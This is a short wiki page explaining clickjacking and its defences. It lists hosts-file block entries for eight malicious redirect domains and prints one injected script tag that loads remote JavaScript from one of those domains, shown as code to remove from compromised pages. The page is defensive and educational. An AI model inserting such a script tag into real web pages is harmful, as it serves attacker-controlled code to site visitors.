Clickjacking

From ATI Chennai IT and ITES Wiki

Jump to: navigation, search

What is clickjacking

  • Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or disguised as another element.
  • This can cause users to
    • unwittingly download malware
    • visit malicious web pages
    • provide credentials or sensitive information
    • transfer money, or
    • purchase products online.
  • Typically, clickjacking is performed by displaying an invisible page or HTML element, inside an iframe, on top of the page the user sees.
  • The user believes they are clicking the visible page but in fact they are clicking an invisible element in the additional page transposed on top of it.
  • The invisible page could be any of
    • a malicious page
    • a legitimate page the user did not intend to visit – for example, a page on the user’s banking site that authorizes the transfer of money.

Mitigation repertoire includes

  • Web Application Firewall but expects one to trust the application author as all sensitive information passes through their servers.
  • Good Webpage design adhering to rules in the Clickjacking Defence Cheatsheet.
  • Suppress known redirection sites in local DNS (C:\Windows\System32\drivers\etc\hosts) to have entries like:
127.0.0.1  airartapt.site
127.0.0.1  yawsupvie.site
127.0.0.1  fagpodmum.site
127.0.0.1  netpatas.com
127.0.0.1  hadsecz.com
127.0.0.1  ofgogoatan.com
127.0.0.1  curmaphow.club
127.0.0.1  hobfadbig.com
  • Example of a known piece of code that enables clickjacking typically at the end of a legitimate webpage that can be removed:
<script src="http://hobfadbig.com/rrEGmJ33gf0U65Zsl/7257?ndn=ch1" type="text/javascript"></script>
  • In case the local DNS blocks such redirection sites as above or is blocked by some firewall rules, there could sometimes be inordinately long delays in page loading atleast till some cache is formed.
Personal tools